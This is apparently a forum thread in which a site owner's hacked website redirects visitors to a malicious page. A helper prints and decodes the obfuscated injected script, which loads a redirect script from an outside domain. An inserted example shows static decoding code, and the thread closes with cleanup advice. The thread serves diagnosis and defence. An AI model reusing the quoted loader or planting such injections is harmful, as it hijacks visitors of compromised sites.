Redirecting to malicious page on all devices

My website loads for 2 seconds and then redirects to a malicious page. I have spoken with my hosting provider, ISP and domain host and they have all said a traceroute shows the final redirect is going to Cloudflare and I need to contact Cloudflare to find out why.
This is happening on every device, browser and network I try and has only started within the last 12 hours.
Here is a screenshot of the page.


Take your domain and content and run as fast as you can away from that host. They obviously don't know what Cloudflare is and how it functions. Any semi-competent host should know this these days, however.

Unless you configured a dedicated redirect via page rule (which is very unlikely and the two seconds would further reject that idea) that redirect comes straight from your server. Your site most likely got compromised and you will need to clean it. For this I’d refer you to something like StackExchange.

To confirm however that it is not Cloudflare related, can you post your domain?


Hi Sandro, I appreciate the input. The site is nisekophotography.com
I do a full backup of the site weekly so I am not too worried about the content, just want to remove the redirect and get back to normal.


Yep, that comes straight from your server via JavaScript.

Are you using something from blackawardago.com? Your site includes a JavaScript file from there which might be responsible for these redirects.

I have no idea what blackawardago.com is. I just ran a Wordfence scan and it returned 2 malicious files within my site. Both are labeled malicious content and critical. I have attached a screenshot below.

In that case you might want to remove that link and, yes, these two entries are probably related. But as I mentioned initially you might want to take that to StackExchange or another appropriate forum.

Cheers, I appreciate the help and will follow your suggestion.

Just a quick follow-up: on line 70 in your main document you have the following code

<script type="9a2268c39b75b57a3d57e54d-text/javascript">eval(String.fromCharCode(118, 97, 114, 32, 100, 61, 100, 111, 99, 117, 109, 101, 110, 116, 59, 118, 97, 114, 32, 115, 61, 100, 46, 99, 114, 101, 97, 116, 101, 69, 108, 101, 109, 101, 110, 116, 40, 39, 115, 99, 114, 105, 112, 116, 39, 41, 59, 32, 10, 115, 46, 116, 121, 112, 101, 61, 39, 116, 101, 120, 116, 47, 106, 97, 118, 97, 115, 99, 114, 105, 112, 116, 39, 59, 10, 115, 46, 97, 115, 121, 110, 99, 61, 116, 114, 117, 101, 59, 10, 118, 97, 114, 32, 112, 108, 32, 61, 32, 83, 116, 114, 105, 110, 103, 46, 102, 114, 111, 109, 67, 104, 97, 114, 67, 111, 100, 101, 40, 49, 48, 52, 44, 32, 49, 49, 54, 44, 32, 49, 49, 54, 44, 32, 49, 49, 50, 44, 32, 49, 49, 53, 44, 32, 53, 56, 44, 32, 52, 55, 44, 32, 52, 55, 44, 32, 57, 56, 44, 32, 49, 48, 56, 44, 32, 57, 55, 44, 32, 57, 57, 44, 32, 49, 48, 55, 44, 32, 57, 55, 44, 32, 49, 49, 57, 44, 32, 57, 55, 44, 32, 49, 49, 52, 44, 32, 49, 48, 48, 44, 32, 57, 55, 44, 32, 49, 48, 51, 44, 32, 49, 49, 49, 44, 32, 52, 54, 44, 32, 57, 57, 44, 32, 49, 49, 49, 44, 32, 49, 48, 57, 41, 59, 10, 115, 46, 115, 114, 99, 61, 112, 108, 43, 39, 47, 115, 116, 97, 116, 46, 106, 115, 63, 108, 61, 49, 49, 38, 39, 59, 32, 10, 105, 102, 32, 40, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 32, 123, 32, 10, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 46, 112, 97, 114, 101, 110, 116, 78, 111, 100, 101, 46, 105, 110, 115, 101, 114, 116, 66, 101, 102, 111, 114, 101, 40, 115, 44, 32, 100, 111, 99, 117, 109, 101, 110, 116, 46, 99, 117, 114, 114, 101, 110, 116, 83, 99, 114, 105, 112, 116, 41, 59, 10, 125, 32, 101, 108, 115, 101, 32, 123, 10, 100, 46, 103, 101, 116, 69, 108, 101, 109, 101, 110, 116, 115, 66, 121, 84, 97, 103, 78, 97, 109, 101, 40, 39, 104, 101, 97, 100, 39, 41, 91, 48, 93, 46, 97, 112, 112, 101, 110, 100, 67, 104, 105, 108, 100, 40, 115, 41, 59, 10, 125));</script>

which translates to

var d=document;var s=d.createElement('script'); 
s.type='text/javascript';
s.async=true;
var pl = String.fromCharCode(104, 116, 116, 112, 115, 58, 47, 47, 98, 108, 97, 99, 107, 97, 119, 97, 114, 100, 97, 103, 111, 46, 99, 111, 109);
s.src=pl+'/stat.js?l=11&'; 
if (document.currentScript) { 
document.currentScript.parentNode.insertBefore(s, document.currentScript);
} else {
d.getElementsByTagName('head')[0].appendChild(s);
}

and inserts the JavaScript code which eventually performs the redirect. Removing that line should fix it for the time being but you should definitely investigate this more thoroughly.

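The decoding walked through in the post above can be done statically, without ever running the injected snippet. The following is an added example, not part of the original thread: the function names are hypothetical, the sample input is constructed to have the same two-layer shape as the quoted code, and `injected.example` is a placeholder host.

```javascript
// Static triage of eval(String.fromCharCode(...)) injections.
// Nothing from the input is executed; layers are decoded as text only.
const CODES = '\\s*([\\d\\s,]+?)\\s*';
const EVAL_WRAP = new RegExp('eval\\(\\s*String\\.fromCharCode\\(' + CODES + '\\)\\s*\\)');
const INNER_CALL = new RegExp('String\\.fromCharCode\\(' + CODES + '\\)', 'g');

// Turn "118, 97, 114" into the text it encodes.
function decodeCodes(list) {
  return list.split(',').filter((n) => n.trim() !== '')
    .map((n) => String.fromCharCode(Number(n))).join('');
}

// Peel eval(...) wrappers: each decoded layer is itself script source.
function peelEvalLayers(src, maxDepth = 10) {
  let code = src, layers = 0, m;
  while (layers < maxDepth && (m = EVAL_WRAP.exec(code))) {
    code = decodeCodes(m[1]);
    layers++;
  }
  return { code, layers };
}

// Replace remaining String.fromCharCode(...) calls with the literal they build.
function inlineLiterals(code) {
  return code.replace(INNER_CALL, (_, list) => JSON.stringify(decodeCodes(list)));
}

// Collect the hosts the decoded script would load resources from.
function externalHosts(code) {
  const urls = code.match(/https?:\/\/[^\s"'\\)]+/g) || [];
  const hosts = urls.flatMap((u) => {
    try { return [new URL(u).hostname]; } catch (e) { return []; }
  });
  return [...new Set(hosts)];
}

function analyze(html) {
  const { code, layers } = peelEvalLayers(html);
  const readable = inlineLiterals(code);
  return { layers, readable, hosts: externalHosts(readable) };
}

// Constructed sample (helper below only builds test input for this example).
const toCodes = (s) => Array.from(s, (c) => c.charCodeAt(0)).join(', ');
const SAMPLE_INNER = "var s=document.createElement('script');\n" +
  'var pl = String.fromCharCode(' + toCodes('https://injected.example') + ');\n' +
  "s.src=pl+'/stat.js?l=11&';";
const SAMPLE_HTML = '<script>eval(String.fromCharCode(' + toCodes(SAMPLE_INNER) + '));</script>';

console.log(analyze(SAMPLE_HTML));
```

Any host reported in `hosts` that the site owner does not recognise is worth searching for across the site's templates, theme files and database content.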

Thanks, that helps a lot. Would a full deletion and reinstall from backup be the simplest solution? Provided I change my access codes etc.

Only if you can guarantee the backup was not already compromised.

The site backs up weekly so I should have a clean version in there somewhere. Since this has only appeared in the last 48 hours I would assume it was compromised not too long ago.

Just make sure you audit the entire setup. If you don't know how it got compromised it could happen again at any moment.


I understand. Thanks Sandro, I appreciate your help and insight. I have an idea how it was compromised and it fits with the timeline. I recently set up a new add-on domain and due to an emergency didn’t finish the complete installation with security until I guess it was too late. I think this could have allowed access to my main site.
